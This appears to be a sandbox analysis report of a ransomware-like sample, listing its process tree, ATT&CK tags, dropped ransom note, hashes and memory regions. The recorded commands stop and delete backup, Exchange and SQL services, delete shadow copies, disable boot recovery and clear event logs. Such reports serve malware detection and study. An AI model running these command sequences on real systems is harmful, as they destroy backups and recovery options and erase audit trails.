C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamCatalogSvc5⤵
-
C:\Windows\SysWOW64\net.exenet stop "Synology Drive VSS Service x64"4⤵
-
C:\Windows\SysWOW64\net.exenet stop VeeanBackupSvc4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeanBackupSvc5⤵
-
C:\Windows\SysWOW64\net.exenet stop VeeamTransportSvc4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc5⤵
-
C:\Windows\SysWOW64\net.exenet stop TPlusStdAppService13004⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TPlusStdAppService13005⤵
-
C:\Windows\SysWOW64\net.exenet stop TPlusStdTaskService13004⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TPlusStdTaskService13005⤵
-
C:\Windows\SysWOW64\net.exenet stop TPlusStdUpgradeService13004⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TPlusStdUpgradeService13005⤵
-
C:\Windows\SysWOW64\net.exenet stop TPlusStdWebService13004⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TPlusStdWebService13005⤵
-
C:\Windows\SysWOW64\cmd.execmd /c "color a & @net stop U8WorkerService1 & @net stop U8WorkerService2 & @net stop "memcached Server" & @net stop Apache2.4 & @net stop UFIDAWebService & @net stop MSComplianceAudit & @net stop MSExchangeADTopology & @net stop MSExchangeAntispamUpdate & @net stop MSExchangeCompliance & @net stop MSExchangeDagMgmt & @net stop MSExchangeDelivery & @net stop MSExchangeDiagnostics & @net stop MSExchangeEdgeSync & @net stop MSExchangeFastSearch & @net stop MSExchangeFrontEndTransport & @net stop MSExchangeHM & @net stop MSSQL$SQL2008 & @net stop MSExchangeHMRecovery & @net stop MSExchangeImap4 & @net stop MSExchangeIMAP4BE & @net stop MSExchangeIS & @net stop MSExchangeMailboxAssistants & @net stop MSExchangeMailboxReplication & @net stop MSExchangeNotificationsBroker & @net stop MSExchangePop3 & @net stop MSExchangePOP3BE & @net stop MSExchangeRepl & @net stop MSExchangeRPC & @net stop MSExchangeServiceHost & @net stop MSExchangeSubmission & @net stop MSExchangeThrottling & @net stop MSExchangeTransport & @net stop MSExchangeTransportLogSearch & @net stop MSExchangeUM & @net stop MSExchangeUMCR & @net stop MySQL5_OA"3⤵
-
C:\Windows\SysWOW64\net.exenet stop U8WorkerService14⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop U8WorkerService15⤵
-
C:\Windows\SysWOW64\net.exenet stop U8WorkerService24⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop U8WorkerService25⤵
-
C:\Windows\SysWOW64\net.exenet stop "memcached Server"4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "memcached Server"5⤵
-
C:\Windows\SysWOW64\net.exenet stop Apache2.44⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Apache2.45⤵
-
C:\Windows\SysWOW64\net.exenet stop UFIDAWebService4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop UFIDAWebService5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSComplianceAudit4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSComplianceAudit5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeADTopology4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeADTopology5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeAntispamUpdate4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeAntispamUpdate5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeCompliance4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeCompliance5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeDagMgmt4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeDagMgmt5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeDelivery4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeDelivery5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeDiagnostics4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeDiagnostics5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeEdgeSync4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeEdgeSync5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeFastSearch4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeFastSearch5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeFrontEndTransport4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeFrontEndTransport5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$SQL20084⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL20085⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeHMRecovery4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeHMRecovery5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeHM4⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeImap44⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeImap45⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeIMAP4BE4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeIMAP4BE5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeIS4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeIS5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeMailboxAssistants4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeMailboxAssistants5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeMailboxReplication4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeMailboxReplication5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeNotificationsBroker4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeNotificationsBroker5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangePop34⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangePop35⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangePOP3BE4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangePOP3BE5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeRepl4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeRepl5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeRPC4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeRPC5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeServiceHost4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeServiceHost5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WEVTUTIL EL3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL EL4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "AMSI/Debug"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "AirSpaceChannel"3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Analytic"3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Application"3⤵
- Clears Windows event logs
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "DirectShowFilterGraph"3⤵
- Clears Windows event logs
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "DirectShowPluginControl"3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Els_Hyphenation/Analytic"3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "EndpointMapper"3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "FirstUXPerf-Analytic"3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "ForwardedEvents"3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "General Logging"3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "HardwareEvents"3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "IHM_DebugChannel"3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Intel-iaLPSS-GPIO/Analytic"3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Intel-iaLPSS-I2C/Analytic"3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Intel-iaLPSS2-GPIO2/Debug"3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Intel-iaLPSS2-GPIO2/Performance"3⤵
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Intel-iaLPSS2-I2C/Debug"3⤵
-
C:\Users\Admin\AppData\Local\Temp\tmp.exeC:\Users\Admin\AppData\Local\Temp\tmp.exe2⤵
- Checks computer location settings
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\system32\vssadmin.exe"C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&rem Kill "SQL"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLFDLauncher"4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures3⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "VMware NAT Service"1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop JWRinfoClientService1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop FirebirdServerDefaultInstance1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASWebServer1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "AliyunService"1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RapService1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Defense Evasion
Indicator Removal on Host
1File Deletion
2Impair Defenses
1File Permissions Modification
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\7-Zip\Lang\FILE RECOVERY.txtFilesize
1KB
MD560bdfcf30bfca987709978d5ab14992a
SHA1aed3522cc0d6380927aade25a2c32a847da43e9a
SHA256e86627865f09510ca6b75530be9a272d5543f116ac883907850f62b8389a7727
SHA5123de54a57f3752e57118fb8c407dffba20234ef8a5b0918d97eb949feeee7c631a73feb4d4e5bad1755701a8f0770d5b0266228302a73fe8330b663bfb7fe6322
-
C:\Users\Admin\AppData\Local\Temp\Wvjrrzxdkill$-arab.batFilesize
53KB
MD5b57545cb36ef6a19fdde4b2208ebb225
SHA11d319740835ff12562e04cc74545a047bba63031
SHA256445d709ea4ae38706a0cc47ffc6c100fb9a354ff1ac718d0c23415524bdfc895
SHA5123618bb17282d8d82ff280590563eebd5c0b181d24156f6a69cba53d17a1bae0d9287c9f191efbe6c3d4223bcb47348c74177000aa0844263ed176df56e1f0856
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dyorghvc.pru.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/3140-134-0x0000000005D50000-0x00000000062F4000-memory.dmpFilesize
5.6MB
-
memory/3140-135-0x0000000005690000-0x0000000005722000-memory.dmpFilesize
584KB
-
memory/3140-136-0x0000000005940000-0x0000000005950000-memory.dmpFilesize
64KB
-
memory/3140-137-0x0000000005660000-0x000000000566A000-memory.dmpFilesize
40KB
-
memory/3140-138-0x0000000007270000-0x0000000007292000-memory.dmpFilesize
136KB
-
memory/3140-133-0x0000000000C10000-0x0000000000C9A000-memory.dmpFilesize
552KB
-
memory/3140-158-0x0000000005940000-0x0000000005950000-memory.dmpFilesize
64KB
-
memory/3720-193-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-195-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-13075-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-2779-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-1380-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-198-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-197-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-196-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-183-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-184-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-185-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-168-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-169-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-171-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-172-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-194-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-174-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-177-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-178-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-179-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-180-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-182-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-190-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-192-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-189-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3720-186-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/4160-147-0x00000000056D0000-0x0000000005736000-memory.dmpFilesize
408KB
-
memory/4160-141-0x0000000004FC0000-0x0000000005026000-memory.dmpFilesize
408KB
-
memory/4160-148-0x0000000002340000-0x0000000002350000-memory.dmpFilesize
64KB
-
memory/4160-161-0x0000000002340000-0x0000000002350000-memory.dmpFilesize
64KB
-
memory/4160-160-0x0000000002340000-0x0000000002350000-memory.dmpFilesize
64KB
-
memory/4160-159-0x0000000002340000-0x0000000002350000-memory.dmpFilesize
64KB
-
memory/4160-140-0x0000000005030000-0x0000000005658000-memory.dmpFilesize
6.2MB
-
memory/4160-157-0x00000000061C0000-0x00000000061DA000-memory.dmpFilesize
104KB
-
memory/4160-156-0x0000000002340000-0x0000000002350000-memory.dmpFilesize
64KB
-
memory/4160-139-0x00000000023A0000-0x00000000023D6000-memory.dmpFilesize
216KB
-
memory/4160-155-0x0000000007330000-0x00000000079AA000-memory.dmpFilesize
6.5MB
-
memory/4160-154-0x0000000005CE0000-0x0000000005CFE000-memory.dmpFilesize
120KB
-
memory/4160-153-0x0000000002340000-0x0000000002350000-memory.dmpFilesize
64KB